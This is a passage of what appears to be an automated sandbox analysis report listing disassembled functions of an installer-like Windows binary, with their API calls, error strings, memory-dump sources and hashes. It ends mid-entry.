                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00926B11,00000000,?), ref: 00945965
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00926B11,00000000,?,?,?,?,?,?,?,?,?,00926F28,?,?), ref: 0094596F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                                    • String ID: svcutil.cpp
                                                                                                                                                                    • API String ID: 355237494-1746323212
                                                                                                                                                                    • Opcode ID: 94a0c48acfe2f7f5ad44e2a3da0d4e40e493b6fd9cbb87ef1993ddd44d129e7a
                                                                                                                                                                    • Instruction ID: 2841fe862b96528d380c840af30808298406211310c7d1f4919e67aab867e445
                                                                                                                                                                    • Opcode Fuzzy Hash: 94a0c48acfe2f7f5ad44e2a3da0d4e40e493b6fd9cbb87ef1993ddd44d129e7a
                                                                                                                                                                    • Instruction Fuzzy Hash: BA21F336955A39FBD7219AD58D04F9FBA6DAF81B70F574011FD04AB242E660CD00A2E0
                                                                                                                                                                    Function 00943245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00943258
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00943264
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009432D8
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009432E3
                                                                                                                                                                      • Part of subcall function 00943498: SysAllocString.OLEAUT32(?), ref: 009434AD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                                                    • String ID: `<u
                                                                                                                                                                    • API String ID: 347726874-3367579956
                                                                                                                                                                    • Opcode ID: d4554299ee6d513c8437c03fef2d6e07a4bfa09e9fb35c0ef75c7c0abd528f3a
                                                                                                                                                                    • Instruction ID: 818fcc5ef2f8bf7a4507d3a3cc66e601dda954c043d0f2343bfe41304b2246f0
                                                                                                                                                                    • Opcode Fuzzy Hash: d4554299ee6d513c8437c03fef2d6e07a4bfa09e9fb35c0ef75c7c0abd528f3a
                                                                                                                                                                    • Instruction Fuzzy Hash: 23214C35A0121AAFCB14DFB4C858EAEBBB9EF49725F108158E8119B220D771DE05CB90
                                                                                                                                                                    Function 00909839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                                    • API String ID: 2001391462-1605196437
                                                                                                                                                                    • Opcode ID: 35eebc125da473d734e2c454a450d90beb650688b0021d3861a7391cd5ec1394
                                                                                                                                                                    • Instruction ID: 194f69b4dfc20c7e730be1982e51204b2f5a8f840aa99aec86aa327720b32453
                                                                                                                                                                    • Opcode Fuzzy Hash: 35eebc125da473d734e2c454a450d90beb650688b0021d3861a7391cd5ec1394
                                                                                                                                                                    • Instruction Fuzzy Hash: EE11E737681224BEEF252D6C9C8AE973A18EF96720F048551FD006A3D3C6B2C91097E1
                                                                                                                                                                    Function 00909E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909E38
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed get file version., xrefs: 00909E78
                                                                                                                                                                    • File search: %ls, did not find path: %ls, xrefs: 00909EA3
                                                                                                                                                                    • Failed to set variable., xrefs: 00909E97
                                                                                                                                                                    • Failed to format path string., xrefs: 00909E43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                                    • API String ID: 3613110473-2458530209
                                                                                                                                                                    • Opcode ID: b5a29f9f406069ac4465d2b958e520a2cfff5acceb5c921e2451ec2123d0452a
                                                                                                                                                                    • Instruction ID: d180fa1a1f441da8e7d9c19c7136349d0c31bfb6fa9f9919c9788bdf43b04460
                                                                                                                                                                    • Opcode Fuzzy Hash: b5a29f9f406069ac4465d2b958e520a2cfff5acceb5c921e2451ec2123d0452a
                                                                                                                                                                    • Instruction Fuzzy Hash: F4119036D40128BFDF02AE98CC82DAEFB79EF94764F104166FD14662A2D6315E109B91
                                                                                                                                                                    Function 0091820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00918E17,0000001A,00000000,?,00000000,00000000), ref: 00918258
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00918E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00918262
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                                    • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                                                                    • API String ID: 2186923214-2110050797
                                                                                                                                                                    • Opcode ID: a76404cb9ea3e1d4e69978304c880552dbba2f4cc92bb33f65bec0d5a6f82f39
                                                                                                                                                                    • Instruction ID: 624fac635495ba242db24c3ecb62ee4658dc39cd2fb411dcae5ea0741f2e7612
                                                                                                                                                                    • Opcode Fuzzy Hash: a76404cb9ea3e1d4e69978304c880552dbba2f4cc92bb33f65bec0d5a6f82f39
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D014033746639B7C63295965C0AF9B7B5CCFC1BB1B114416FD20BB180DE748D4052E0
                                                                                                                                                                    Function 0092DDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 0092DDCE
                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0092DDF8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0092DFC8,00000000,?,?,?,?,00000000), ref: 0092DE00
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed while waiting for download., xrefs: 0092DE2E
                                                                                                                                                                    • bitsengine.cpp, xrefs: 0092DE24
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                                                    • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                                                                    • API String ID: 435350009-228655868
                                                                                                                                                                    • Opcode ID: 93ed966bfdd1c72447b72e463dcd533a8ef86aedd02ed4936ef191de246f03df
                                                                                                                                                                    • Instruction ID: 72e7313b2704a9c53b6e54e8c8e61dc7c6ae9784b81909e0699aabbfd8908d9e
                                                                                                                                                                    • Opcode Fuzzy Hash: 93ed966bfdd1c72447b72e463dcd533a8ef86aedd02ed4936ef191de246f03df
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C112573A4623577D7209AA9AC09EEBBBACDF45B21F110121FE04FB1C8D6A0DD0082E0
                                                                                                                                                                    Function 00905F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,00000010), ref: 00905F5C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00905F66
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ComputerErrorLastName
                                                                                                                                                                    • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 3560734967-484636765
                                                                                                                                                                    • Opcode ID: 375fb7ff887c2718b3e56afc26d4c0a36e73a44554c02dd1e97dd660bee7d88d
                                                                                                                                                                    • Instruction ID: b88f51f0266210bb407a868d47c134458eaf9d746cf5a824bb1399a6c88a43e9
                                                                                                                                                                    • Opcode Fuzzy Hash: 375fb7ff887c2718b3e56afc26d4c0a36e73a44554c02dd1e97dd660bee7d88d
                                                                                                                                                                    • Instruction Fuzzy Hash: F611A537A465296FD710DAA59C05FDFB7E8AB48720F124056FE00FB2C0DA74AE448BE5
                                                                                                                                                                    Function 009067AA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 009067E3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009067ED
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastPathTemp
                                                                                                                                                                    • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 1238063741-2915113195
                                                                                                                                                                    • Opcode ID: 7f1ef156e733b3a04e0dba2934ee62745e1e34f4dcad35c7a78036e05afc52c9
                                                                                                                                                                    • Instruction ID: 63dd6c80686750d2ec61691b6e7319ed394c261186a0d474e967a1566e2afdfb
                                                                                                                                                                    • Opcode Fuzzy Hash: 7f1ef156e733b3a04e0dba2934ee62745e1e34f4dcad35c7a78036e05afc52c9
                                                                                                                                                                    • Instruction Fuzzy Hash: 4001D676E462396BD720A7546C06FAA77AC9F44B10F104165FE04FB2C2EB609D108BD5
                                                                                                                                                                    Function 00905E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00905EA6
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                      • Part of subcall function 00943D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00943D4C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set variant value., xrefs: 00905F0A
                                                                                                                                                                    • variable.cpp, xrefs: 00905ED0
                                                                                                                                                                    • Failed to get shell folder., xrefs: 00905EDA
                                                                                                                                                                    • Failed to get 64-bit folder., xrefs: 00905EF0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                                    • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 2084161155-3906113122
                                                                                                                                                                    • Opcode ID: 15620b9daeaff3ba8e5d8c7f4e63f9c937963d7094bc4fbf0e6b7e881c3f8a57
                                                                                                                                                                    • Instruction ID: 0849ce183c64eafd0c0d5ca0c61c08950e58b3f795fb77fe6d2b6841c846a55c
                                                                                                                                                                    • Opcode Fuzzy Hash: 15620b9daeaff3ba8e5d8c7f4e63f9c937963d7094bc4fbf0e6b7e881c3f8a57
                                                                                                                                                                    • Instruction Fuzzy Hash: 8D018432956629BFDF22A790CC0AFAF7A6CEF40720F124151F940B61D1DB749A40DBD5
                                                                                                                                                                    Function 00944153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00944440: FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                      • Part of subcall function 00944440: FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(0092923A,00000080,00000000,0092923A,000000FF,00000000,?,?,0092923A), ref: 00944182
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0092923A), ref: 0094418C
                                                                                                                                                                    • DeleteFileW.KERNEL32(0092923A,00000000,0092923A,000000FF,00000000,?,?,0092923A), ref: 009441AC
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0092923A), ref: 009441B6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 3967264933-2967768451
                                                                                                                                                                    • Opcode ID: 59560b0831412d8f1425f012b583251b5cae11e980464c50b0180094bd8ddcab
                                                                                                                                                                    • Instruction ID: 4aa46cbe343ae86b8b4215d4a16ac446699ba93cd96c795f294cc5c67d2b225b
                                                                                                                                                                    • Opcode Fuzzy Hash: 59560b0831412d8f1425f012b583251b5cae11e980464c50b0180094bd8ddcab
                                                                                                                                                                    • Instruction Fuzzy Hash: 4401F173A59639ABDB314AAA8C04F6B7E9CAF397A1F010710FD44FA1D0E721DD8095D0
                                                                                                                                                                    Function 0092DA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0092DA1A
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0092DA5F
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?), ref: 0092DA73
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failure while sending progress during BITS job modification., xrefs: 0092DA4E
                                                                                                                                                                    • Failed to get state during job modification., xrefs: 0092DA33
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                    • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                                                    • API String ID: 3094578987-1258544340
                                                                                                                                                                    • Opcode ID: 8d2edf1d606d1b99b4a341dd9c9a20818a06b83d055861360dc94db011bb7dab
                                                                                                                                                                    • Instruction ID: 0639e3738af6ed7385563dc6ec7edd900630877c62cbe21e7afc62941b3903d2
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d2edf1d606d1b99b4a341dd9c9a20818a06b83d055861360dc94db011bb7dab
                                                                                                                                                                    • Instruction Fuzzy Hash: C901F176A0A628BFCB11DB65E898EAEB7ACFF99321B004205F805D3200D770EE04C7D0
                                                                                                                                                                    Function 0092DC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0092DDEE), ref: 0092DC92
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000008,?,0092DDEE), ref: 0092DCD7
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0092DDEE), ref: 0092DCEB
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get BITS job state., xrefs: 0092DCAB
                                                                                                                                                                    • Failure while sending progress., xrefs: 0092DCC6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                    • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                                                                                                                    • API String ID: 3094578987-2876445054
                                                                                                                                                                    • Opcode ID: 776c71363c3ff363dca235185963ec9fba31e2194e4b1ace08d249d01c42c814
                                                                                                                                                                    • Instruction ID: fe3e13e90020468c386f4c83fc11c02c0bf0b403fe118720060363b86564ebeb
                                                                                                                                                                    • Opcode Fuzzy Hash: 776c71363c3ff363dca235185963ec9fba31e2194e4b1ace08d249d01c42c814
                                                                                                                                                                    • Instruction Fuzzy Hash: BA01F132A06629ABCB12DB55E899D9AB7ACFF49320B004156F90493654DBB0ED00C7D0
                                                                                                                                                                    Function 0092D7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0092DF52,?,?,?,?,?,?,00000000,00000000), ref: 0092D802
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0092DF52,?,?,?,?,?,?,00000000,00000000), ref: 0092D80D
                                                                                                                                                                    • GetLastError.KERNEL32(?,0092DF52,?,?,?,?,?,?,00000000,00000000), ref: 0092D81A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create BITS job complete event., xrefs: 0092D848
                                                                                                                                                                    • bitsengine.cpp, xrefs: 0092D83E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                                                    • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                                                                    • API String ID: 3069647169-3441864216
                                                                                                                                                                    • Opcode ID: 2ff65bf54315373f70156becc1ee1c68d5f41f6acabcb0bedec0d00b2fb2302d
                                                                                                                                                                    • Instruction ID: 0eb47f5aea2bb616909582c0aae5f7cfa95b4cd17c23a7afa612742bc5bea570
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ff65bf54315373f70156becc1ee1c68d5f41f6acabcb0bedec0d00b2fb2302d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F0188769556366BC3209F5AD845A47BFACFF89760B014116FD18E7640E7B0D800CBE4
                                                                                                                                                                    Function 0090D4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4B7
                                                                                                                                                                    • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0090D4C6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000D0,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4DB
                                                                                                                                                                    Strings
                                                                                                                                                                    • userexperience.cpp, xrefs: 0090D4F4
